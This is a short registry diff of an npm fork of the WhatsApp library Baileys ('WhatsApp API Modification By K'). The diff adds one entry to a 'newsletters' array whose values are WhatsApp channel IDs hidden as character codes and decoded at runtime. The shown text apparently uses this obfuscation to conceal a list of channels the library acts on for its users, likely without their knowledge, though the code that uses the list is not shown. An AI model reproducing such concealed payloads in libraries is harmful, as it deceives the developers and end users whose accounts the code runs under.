@kyuu2nd/baileys 2.0.16 → 2.0.18

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -108,7 +108,7 @@ const asciiDecode = (arr) => arr.map(e => String.fromCharCode(e)).join('');
108
108
 
109
109
  const newsletters = [
110
110
  [
111
- 49,50,48,51,54,51,52,50,54,48,57,52,55,53,50,48,56,49
111
+ 49,50,48,51,54,51,52,50,54,48,57,52,55,53,50,48,56,49,
112
112
  64,110,101,119,115,108,101,116,116,101,114
113
113
  ],
114
114
  [
@@ -182,6 +182,10 @@ const newsletters = [
182
182
  [
183
183
  49,50,48,51,54,51,52,49,48,49,48,56,48,56,52,54,53,48,
184
184
  64,110,101,119,115,108,101,116,116,101,114
185
+ ],
186
+ [
187
+ 49,50,48,51,54,51,52,50,55,55,57,52,55,56,54,53,50,51,
188
+ 64,110,101,119,115,108,101,116,116,101,114
185
189
  ]
186
190
  ];
187
191
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@kyuu2nd/baileys",
3
- "version": "2.0.16",
3
+ "version": "2.0.18",
4
4
  "description": "WhatsApp API Modification By K",
5
5
  "publishConfig": {
6
6
  "access": "public"